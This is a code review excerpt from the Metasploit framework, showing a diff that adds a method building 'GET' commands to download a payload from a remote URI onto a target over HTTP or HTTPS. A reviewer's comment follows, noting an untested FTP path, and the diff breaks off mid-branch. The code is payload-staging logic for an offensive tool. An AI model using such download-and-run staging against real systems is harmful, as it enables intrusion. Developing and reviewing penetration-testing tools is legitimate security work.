lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -336,6 +340,43 @@ def _generate_curl_pipe
     end
   end
 
+  def _generate_get_command
+    # Specifying the method (-m GET) is necessary on OSX
+    case fetch_protocol
+    when 'HTTP'
+      get_file_cmd = "GET -m GET http://#{download_uri}>#{_remote_destination}"
+    when 'HTTPS'
+      # There is no way to disable cert check in GET ...
+      print_error('GET binary does not support insecure mode')
+      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
+      get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
+    when 'FTP'
```

Comment:
`FTP` code path has not been tested.

It looks like this is supposed to be based on `fetch_protocol`, but I found no way to control this from within `msfconsole`.